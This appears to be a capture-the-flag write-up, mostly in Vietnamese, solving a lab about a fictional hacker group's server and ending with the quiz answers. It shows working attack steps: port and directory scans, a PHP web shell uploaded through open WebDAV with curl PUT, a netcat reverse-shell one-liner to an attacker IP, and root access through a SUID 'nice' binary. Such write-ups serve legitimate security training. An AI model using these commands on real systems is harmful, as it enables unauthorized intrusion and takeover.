Secureless Lab
Secureless Lab
You have a mission regarding the hacker group “Melody Hacker Team”, whose activity has increased significantly recently. This group is known for unauthorized server access, DDoS and malware attacks. Your objective is to gather detailed information about the group’s activities and possible new cyber attack plans. You have access to the group’s website. We trust you will succeed in this challenging task. We wish you success!
What is the name of the service found to be insecure?
- Quét mục tiêu bằng nmap :
__ __ __ _
/ / / /___ ______/ /___ __(_)_______ _____
/ /_/ / __ `/ ___/ //_/ | / / / ___/ _ \/ ___/
/ __ / /_/ / /__/ ,< | |/ / (__ ) __/ /
/_/ /_/\__,_/\___/_/|_| |___/_/____/\___/_/
┌─[root@hackerbox]─[~]
└──╼ #nmap -sC -sV -p- melodyhackerteam.hv
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-11-14 06:57 CST
Nmap scan report for melodyhackerteam.hv (172.20.1.156)
Host is up (0.00048s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey:
| 3072 5a:bc:c1:64:1b:a8:93:67:8c:a5:3a:c9:5e:28:94:50 (RSA)
| 256 71:07:65:ed:45:e7:b6:a5:18:c4:89:be:bc:fe:fb:01 (ECDSA)
|_ 256 1f:7f:9d:f3:96:52:6f:b8:90:7e:dc:8e:b2:d6:2c:1d (ED25519)
80/tcp open http Apache httpd 2.4.56 ((Debian))
|_http-title: Melody Hacker Team
|_http-server-header: Apache/2.4.56 (Debian)
MAC Address: 52:54:00:A8:A6:AF (QEMU virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.86 seconds
- Sau đó tôi scan thư mục bằng Gobuster :
__ __ __ _
/ / / /___ ______/ /___ __(_)_______ _____
/ /_/ / __ `/ ___/ //_/ | / / / ___/ _ \/ ___/
/ __ / /_/ / /__/ ,< | |/ / (__ ) __/ /
/_/ /_/\__,_/\___/_/|_| |___/_/____/\___/_/
┌─[root@hackerbox]─[~]
└──╼ #gobuster dir -u "http://melodyhackerteam.hv/" -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://melodyhackerteam.hv/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.hta (Status: 403) [Size: 284]
/.htaccess (Status: 403) [Size: 284]
/.htpasswd (Status: 403) [Size: 284]
/css (Status: 301) [Size: 324] [--> http://melodyhackerteam.hv/css/]
/font (Status: 301) [Size: 325] [--> http://melodyhackerteam.hv/font/]
/image (Status: 301) [Size: 326] [--> http://melodyhackerteam.hv/image/]
/index.html (Status: 200) [Size: 1723]
/js (Status: 301) [Size: 323] [--> http://melodyhackerteam.hv/js/]
/server-status (Status: 403) [Size: 284]
/webdav (Status: 403) [Size: 284]
Progress: 4614 / 4615 (99.98%)
===============================================================
Finished
===============================================================
┌─[root@hackerbox]─[~]
└──╼ #==> The Answer : webdav
What is the path of the “hacked by” index page used by the hacker group in zip format on the server?
- Tôi truy cập vào /webdav thì không được , search trên gg và AI thì bết được WEBDAV (Web Distributed Authoring and Versioning) là một tập hợp các mở rộng của giao thức HTTP cho phép người dùng cộng tác chỉnh sửa và quản lý các tập tin trên máy chủ web từ xa.
- Khái niệm cơ bản:
- WEBDAV biến máy chủ web từ một hệ thống chỉ đọc thành một hệ thống có thể ghi và chỉnh sửa
- Cho phép người dùng tạo, di chuyển, sao chép và xóa các tập tin/thư mục trên máy chủ web
- Hoạt động như một “ổ đĩa mạng” qua internet
Các tính năng chính:
- Hoạt động với tập tin:
- PUT: Tải tập tin lên máy chủ
- DELETE: Xóa tập tin
- COPY: Sao chép tập tin
- MOVE: Di chuyển tập tin
- Quản lý thư mục:
- MKCOL: Tạo thư mục mới (Make Collection)
- PROPFIND: Lấy thông tin về tập tin/thư mục
- Khóa tập tin:
-
Ngăn chặn xung đột khi nhiều người cùng chỉnh sửa một tập tin
-
Đảm bảo tính toàn vẹn dữ liệu.
-
Tôi dùng curl để kiểm tra xem webdav được bật chưa bằng lệnh như sau :
┌─[root@hackerbox]─[~]
└──╼ #curl -X OPTIONS http://melodyhackerteam.hv/webdav/ -I
HTTP/1.1 200 OK
Date: Wed, 19 Nov 2025 02:17:47 GMT
Server: Apache/2.4.56 (Debian)
DAV: 1,2
DAV: <http://apache.org/dav/propset/fs/1>
MS-Author-Via: DAV
Allow: OPTIONS,GET,HEAD,POST,DELETE,TRACE,PROPFIND,PROPPATCH,COPY,MOVE,LOCK,UNLOCK
Content-Length: 0
Content-Type: httpd/unix-directory- Như kết quả trên cho thấy , webdav đã được bật trên máy chủ mục tiêu và nó chấp nhận các phương thức như GET,HEAD,POST ,…
- Tôi dùng PUT để đẩy 1 file txt lên mục tiêu và kết quả là thành công , nội dung file txt đã được hiển thị trên web . Tiếp đó tôi thử tải websehll lên và thành công :
__ __ __ _
/ / / /___ ______/ /___ __(_)_______ _____
/ /_/ / __ `/ ___/ //_/ | / / / ___/ _ \/ ___/
/ __ / /_/ / /__/ ,< | |/ / (__ ) __/ /
/_/ /_/\__,_/\___/_/|_| |___/_/____/\___/_/
┌─[root@hackerbox]─[~]
└──╼ #nano shellweb.php
┌─[root@hackerbox]─[~]
└──╼ #curl -X PUT --data-binary "@shellweb.php" http://melodyhackerteam.hv/webdav/shell.php
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>201 Created</title>
</head><body>
<h1>Created</h1>
<p>Resource /webdav/shell.php has been created.</p>
<hr />
<address>Apache/2.4.56 (Debian) Server at melodyhackerteam.hv Port 80</address>
</body></html>
┌─[root@hackerbox]─[~]
└──╼ #- Tôi truy cập vào đường dẫn webdav/shell.php và mở 1 shell
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 172.20.7.73 88 >/tmp/f- Sau đó theo yêu cầu của đè bài tôi dùng find để tìm :
$ find / -name "*.zip" 2>/dev/null
/var/www/webdav/web_shell_backup.zip
/var/www/webdav/melody_index.zip==> Tyhe Answer : /var/www/webdav/melody_index.zip
What is the common name of the web shell file used by the hacker group?
- Tôi giải nén file web_shell_backup.zip , nó cho ra 1 file có tên là shell.php . đọc nội dung của nó thì tôi biết được rằng loại wev shell mà nó trả về cũng chính là web shell mà tôi đang sử dụng :))
==> The Answer : p0wny
What is the domain name of the first targeted website?
- Tôi tìm các file *.db để tìm xem có chứa password hay gì đó không những không khả thi
- Tìm file sui để xem có leo thang đươc không thì thầy được /usr/nice:
$ find / -perm -4000 2>/dev/null
/usr/bin/umount
/usr/bin/gpasswd
/usr/bin/su
/usr/bin/passwd
/usr/bin/nice
/usr/bin/mount
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/chfn
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
$ - Tìm trên FTFOBins về nice , Đây.
$ find / -perm -4000 2>/dev/null
/usr/bin/umount
/usr/bin/gpasswd
/usr/bin/su
/usr/bin/passwd
/usr/bin/nice
/usr/bin/mount
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/chfn
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
$ /usr/bin/nice /bin/bash -p
whoami
root
- Sau khi có quyền root thì vào /root mà tìm thôi :
cd /root
ls
telegram_chat_backup.txt
cat *
HackerShadow, [27 Feb 2024 at 21:24:36]:
We use password management software for security. But what if it gets hacked?
CyberWolf, [27 Feb 2024 at 21:25:01]:
That's why we always need to have an offline backup and not rely solely on one platform.
DataKraken, [27 Feb 2024 at 21:25:59]:
True. Btw, did you guys check out the target for our next operation? galacticshop.hv seems vulnerable.
HackerShadow, [27 Feb 2024 at 21:26:20]:
Yeah, I did some preliminary scans. Their server at 93.184.216.34 looks like an easy target for a DDoS attack.
CyberWolf, [27 Feb 2024 at 21:26:45]:
I have a new DDoS tool we can use. It's more efficient and can bypass some of the common DDoS protection.
DataKraken, [27 Feb 2024 at 21:27:10]:
Sounds good. We should also prepare a list of proxy servers to mask our real IP addresses during the attack.
HackerShadow, [27 Feb 2024 at 21:27:35]:
Already on it. I've compiled a list from various sources. We'll be ghosts.
CyberWolf, [27 Feb 2024 at 21:28:00]:
Perfect. Let's discuss the timing. We need to ensure maximum impact.
DataKraken, [27 Feb 2024 at 21:28:25]:
How about we target their peak hours? According to my research, their server traffic peaks around 3 PM UTC.
HackerShadow, [27 Feb 2024 at 21:28:50]:
3 PM UTC it is. Let's coordinate our tools and start the prep. We need to be synchronized to overload their servers.
CyberWolf, [27 Feb 2024 at 21:29:15]:
Agreed. I'll set up the coordination chat. Let's move our discussion there for operational details.
DataKraken, [27 Feb 2024 at 21:29:40]:
Got it. I'm also checking their backup systems. If we can find a way to slow down their recovery, it'll add to the chaos.
HackerShadow, [27 Feb 2024 at 21:30:05]:
Good thinking. Keep us posted on that. Let's make this one count.
CyberWolf, [27 Feb 2024 at 21:30:00]:
This is going to be one for the books. They won't know what hit them.
HackerShadow, [27 Feb 2024 at 21:35:00]:
Everyone, check your setups. We can't afford any mistakes.
DataKraken, [27 Feb 2024 at 21:38:00]:
Everyone, check your setups. We can't afford any mistakes.
HackerShadow, [27 Feb 2024 at 21:41:00]:
Remember, timing is crucial. We hit at 3 PM UTC and not a second later.
DataKraken, [27 Feb 2024 at 21:46:00]:
Just updated our encryption for the coordination chat. We're now using a double-layered encryption method.
HackerShadow, [27 Feb 2024 at 21:49:00]:
Let's keep our communication tight. No details on the open web, not even hints.
DataKraken, [27 Feb 2024 at 21:51:00]:
How are we on the social engineering front? Any way we can manipulate someone on the inside?
DataKraken, [27 Feb 2024 at 21:54:00]:
Did anyone look into the secondary target? innovatesphere.hv could be a good distraction.
DataKraken, [27 Feb 2024 at 22:01:00]:
Just updated our encryption for the coordination chat. We're now using a double-layered encryption method.
DataKraken, [27 Feb 2024 at 22:04:00]:
Any updates on the proxy list? We need as many as we can get to make the attack more effective.
HackerShadow, [27 Feb 2024 at 22:05:00]:
How are we on the social engineering front? Any way we can manipulate someone on the inside?
DataKraken, [27 Feb 2024 at 22:06:00]:
Everyone, check your setups. We can't afford any mistakes.
CyberWolf, [27 Feb 2024 at 22:11:00]:
I'll take the lead on the secondary target. Let's spread their resources thin.
==> The Answer : galacticshop.hv
What is the IP address planned for DDoS attack?
==> The Answer : 93.184.216.34
What is the planned time of DDoS attack?
==> The Answer : 3 PM UTC
What is the domain name of the second targeted website?
==> The Answer : innovatesphere.hv